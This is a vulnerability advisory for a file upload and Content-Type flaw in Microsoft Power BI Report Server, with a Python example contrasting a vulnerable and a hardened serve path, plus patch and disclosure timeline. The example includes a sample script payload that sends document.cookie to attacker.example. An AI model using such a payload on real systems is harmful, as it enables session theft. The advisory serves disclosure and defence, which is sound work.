XLM-2019-712

by adidionxlm

Abstract Advisory Information

Unrestricted file upload vulnerability in the comment section of Microsoft Power BI Report Server allows remote authenticated users to upload arbitrary files and to control the Content-Type value the server uses when another user accesses the uploaded file. For example, an attacker can upload an HTML file containing a malicious JavaScript payload; because the server serves the file with the attacker-chosen Content-Type, the payload is rendered and executed in the browser of any other user who opens it.
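The bug class the abstract describes, as an added example written for this page (it is not code from the advisory or from Microsoft Power BI Report Server): an upload handler that stores the uploader's Content-Type and replays it when serving the file, next to a hardened handler that derives the type server-side from an extension allowlist and the file's magic bytes, forces a download and disables MIME sniffing. The Attachment record, the handler names and the sample uploads are hypothetical.

```python
"""Added example for this advisory page; not code from the advisory or from
Power BI Report Server. Models the described bug (client-controlled
Content-Type replayed when serving an uploaded comment attachment) beside a
hardened serve path. Names and samples below are hypothetical."""
import os
import re
from dataclasses import dataclass


@dataclass
class Attachment:
    filename: str       # file name chosen by the uploader
    content_type: str   # Content-Type the uploader's client sent with the upload
    body: bytes


# Constructed samples (not real captures).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
XSS_BYTES = b"<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"

MALICIOUS = Attachment("chart.html", "text/html", XSS_BYTES)   # HTML labelled as HTML
SPOOFED_PNG = Attachment("chart.png", "image/png", XSS_BYTES)  # HTML hidden behind a .png name
RELABELED = Attachment("chart.png", "text/html", PNG_BYTES)    # real PNG, attacker-chosen type
BENIGN_PNG = Attachment("chart.png", "image/png", PNG_BYTES)

# Server-side allowlist: extension -> (MIME type the server will send, accepted magic bytes).
ALLOWED = {
    ".png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ".jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    ".pdf": ("application/pdf", (b"%PDF-",)),
}
UNSAFE_NAME_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def serve_vulnerable(att: Attachment) -> dict:
    """The pattern the advisory describes: whatever Content-Type the uploader
    supplied is stored and echoed back, so a browser renders HTML inline under
    the server's origin and any script inside it runs."""
    return {"Content-Type": att.content_type}


def validate_upload(att: Attachment) -> str:
    """Decide at upload time which MIME type the server will ever send for this
    file, from the extension allowlist and the file's magic bytes. The client's
    Content-Type is never consulted. Raises ValueError on rejection."""
    ext = os.path.splitext(att.filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext or '(none)'}")
    mime, magics = ALLOWED[ext]
    if not any(att.body.startswith(m) for m in magics):
        raise ValueError(f"content does not look like {mime}")
    return mime


def upload_is_accepted(att: Attachment) -> bool:
    """Boolean wrapper around validate_upload for callers that only need a verdict."""
    try:
        validate_upload(att)
        return True
    except ValueError:
        return False


def serve_hardened(att: Attachment) -> dict:
    """Response headers for an accepted attachment: server-chosen type, forced
    download, no MIME sniffing, and a CSP that neutralises script should a
    browser still render the body."""
    mime = validate_upload(att)
    name = UNSAFE_NAME_CHARS.sub("_", os.path.basename(att.filename)) or "download"
    return {
        "Content-Type": mime,
        "Content-Disposition": f'attachment; filename="{name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def renders_as_html(headers: dict) -> bool:
    """Coarse model of a browser: a text/html body shown inline gets executed."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    inline = not headers.get("Content-Disposition", "").lower().startswith("attachment")
    return ctype == "text/html" and inline


if __name__ == "__main__":
    vuln = serve_vulnerable(MALICIOUS)
    print("vulnerable:", vuln, "-> executes as HTML:", renders_as_html(vuln))
    for att in (MALICIOUS, SPOOFED_PNG, RELABELED, BENIGN_PNG):
        print(att.filename, att.content_type, "accepted:", upload_is_accepted(att))
    print("hardened:", serve_hardened(RELABELED))
```

The two checks that matter when testing a real upload endpoint for this class of bug are the ones the model makes explicit: whether a file uploaded with an attacker-chosen Content-Type is served back with that same type, and whether it is served inline rather than as an attachment. Rejecting by magic bytes as well as by extension closes the double-extension and relabelling variants shown in the samples.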

Authors: Samy Baiwir

Version affected

Name: Microsoft Power BI Report Server

Versions: 15.0.1102.299

Common Vulnerability Scoring System

4.3
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Patches

Version 1.5.7074.36177 (Build 15.0.1102.371): initial fix, later found not to resolve the issue (see timeline)
Version 1.6.7236.4246 (Build 15.0.1102.646): corrected fix confirmed by the vendor

References

https://docs.microsoft.com/en-us/power-bi/report-server/changelog

Vulnerability Disclosure Timeline

  • 10/05/2019: Vulnerability discovered on version 15.0.1102.235
  • 21/05/2019: Vulnerability validated on the latest available version (15.0.1102.299)
  • 23/05/2019: First contact with vendor
  • 29/05/2019: Vendor acknowledges and validates the vulnerability
  • 31/05/2019: Bug bounty submitted on msrc.microsoft.com
  • 10/07/2019: Fix released: 1.5.7074.36177 (Build 15.0.1102.371)
  • 11/07/2019: Vendor confirms that no CVE-ID will be assigned
  • 12/08/2019: Patch does not work; vendor re-contacted
  • 27/08/2019: Vendor acknowledges and validates the vulnerability
  • 05/09/2019: Vendor asks us not to publish the vulnerability
  • 19/09/2019: Vendor asks us not to publish the vulnerability
  • 17/10/2019: Vendor confirms a new fix is available: 1.6.7236.4246 (Build 15.0.1102.646)
  • 09/12/2019: Public disclosure